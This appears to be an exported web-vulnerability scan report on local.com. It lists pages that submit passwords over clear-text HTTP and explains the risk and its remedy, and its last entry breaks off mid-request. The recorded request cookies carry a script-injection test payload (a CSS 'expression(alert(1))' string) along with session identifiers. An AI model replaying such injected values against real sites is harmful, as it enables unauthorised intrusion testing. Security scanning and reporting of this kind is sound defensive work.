3. Cleartext submission of password previous next
There are 31 instances of this issue:

/
/business/
/business/details/dallas-tx/amegy-bank-97648000/
/business/details/dallas-tx/cet-products-liquidators-9985416/
/business/details/dallas-tx/equity-bank-63975058/
/business/details/dallas-tx/hillcrest-bank-104826937/
/business/details/dallas-tx/sterling-bank-16856575/
/business/details/map/dallas-tx/amegy-bank-97648000/
/business/details/map/dallas-tx/cet-products-liquidators-9985416/
/business/details/map/dallas-tx/equity-bank-63975058/
/business/details/map/dallas-tx/hillcrest-bank-104826937/
/business/details/map/dallas-tx/sterling-bank-16856575/
/business/results/
/contact.aspx
/coupons/
/coupons/printable/
/dialogs/register.aspx
/events/
/events/category/music/dallas-tx.aspx
/events/category/performing-arts/dallas-tx.aspx
/events/category/sports/dallas-tx.aspx
/faq.aspx
/privacy/
/results.aspx
/results/
/sitemap.aspx
/sitemap/chicago-il.aspx
/sitemap/los-angeles-ca.aspx
/sitemap/new-york-ny.aspx
/terms/
/topics/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

3.1. http://www.local.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.2. http://www.local.com/business/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/business/

The form contains the following password field:

password

Request

GET /business/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/

The form contains the following password field:

password

Request

GET /business/details/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

3.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

The form contains the following password field:

password

Request

GET /business/details/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

3.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/business/details/dallas-tx/equity-bank-63975058/

The form contains the following password field:

password

Request

GET /business/details/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

3.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/

The form contains the following password field:

password

Request

GET /business/details/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

3.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/

The form contains the following password field:

password

Request

GET /business/details/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

3.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/

The form contains the following password field:

password

Request

GET /business/details/map/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/

The form contains the following password field:

password

Request

GET /business/details/map/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/

The form contains the following password field:

password

Request

GET /business/details/map/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/

The form contains the following password field:

password

Request

GET /business/details/map/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/

The form contains the following password field:

password

Request

GET /business/details/map/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.13. http://www.local.com/business/results/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/results/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/business/results/

The form contains the following password field:

password

Request

GET /business/results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.14. http://www.local.com/contact.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/contact.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/contact.aspx

The form contains the following password field:

password

Request

GET /contact.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
